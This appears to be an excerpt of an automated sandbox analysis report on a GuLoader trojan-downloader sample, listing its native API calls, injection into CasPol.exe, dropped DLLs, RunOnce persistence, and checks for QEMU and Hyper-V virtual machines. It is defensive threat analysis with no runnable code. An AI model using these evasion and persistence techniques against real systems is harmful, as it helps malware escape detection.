Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258AE0	1_2_03258AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258AEC	1_2_03258AEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032560F0	1_2_032560F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325ECFE	1_2_0325ECFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_032518DB	1_2_032518DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_3_00EDD5B5	3_3_00EDD5B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00B1DE72	3_2_00B1DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00B1E051	3_2_00B1E051
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00D666C8	3_2_00D666C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00D603C0	3_2_00D603C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00F9D1A5	3_2_00F9D1A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00F97AD0	3_2_00F97AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00F9AA0A	3_2_00F9AA0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00F91D28	3_2_00F91D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01136862	3_2_01136862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_011364C8	3_2_011364C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01135330	3_2_01135330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0113AFC8	3_2_0113AFC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0113EFF0	3_2_0113EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0113B931	3_2_0113B931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0113BA30	3_2_0113BA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01134AE0	3_2_01134AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_011466A8	3_2_011466A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0114A108	3_2_0114A108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01146290	3_2_01146290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_011466A2	3_2_011466A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01142A28	3_2_01142A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_1CF95E08	3_2_1CF95E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_1CF94FF0	3_2_1CF94FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_1CF946C4	3_2_1CF946C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_1CF95D20	3_2_1CF95D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_1CF96AF1	3_2_1CF96AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01132B98	3_2_01132B98

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325FB02 NtProtectVirtualMemory,	1_2_0325FB02
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325E349 NtAllocateVirtualMemory,	1_2_0325E349
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325FFD2 NtResumeThread,	1_2_0325FFD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_00B1DDAE NtCreateThreadEx,	3_2_00B1DDAE

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37818617238.00000000028F0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

PE file contains strange resources

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Virustotal: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03

Source: Yara match	File source: 00000001.00000002.37821177352.0000000003251000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.37160550415.0000000000B10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_713D30C0 push eax; ret	1_2_713D30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03252B6D push edi; iretd	1_2_03252B6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03252BAA push 00000008h; iretd	1_2_03252BAD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03256618 push ebx; retf	1_2_0325665A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325821B push edi; iretd	1_2_0325821E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03254CAE push esi; retf	1_2_03254CBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03253A84 push ds; iretd	1_2_03253AD7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258A83 pushfd ; retn 0004h	1_2_03258AD4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03253C9D push ds; iretd	1_2_03253AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_3_00EE02B3 pushad ; retf	3_3_00EE02DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_3_00EE2ACE push esp; retf	3_3_00EE2AF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_0113A159 push ebx; retf	3_2_0113A15B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 3_2_01131051 push eax; ret	3_2_011315E1

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	File created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	File created: C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	API call chain: ExitProcess graph end node

Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052117582.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 00000003.00000003.38236903342.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.42052633548.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821318181.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe, 00000001.00000002.37821586909.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258525 mov eax, dword ptr fs:[00000030h]	1_2_03258525
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325EF5D mov eax, dword ptr fs:[00000030h]	1_2_0325EF5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325D9AD mov eax, dword ptr fs:[00000030h]	1_2_0325D9AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_0325DF99 mov eax, dword ptr fs:[00000030h]	1_2_0325DF99
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258BC7 mov eax, dword ptr fs:[00000030h]	1_2_03258BC7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03255004 mov eax, dword ptr fs:[00000030h]	1_2_03255004
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258C4F mov eax, dword ptr fs:[00000030h]	1_2_03258C4F
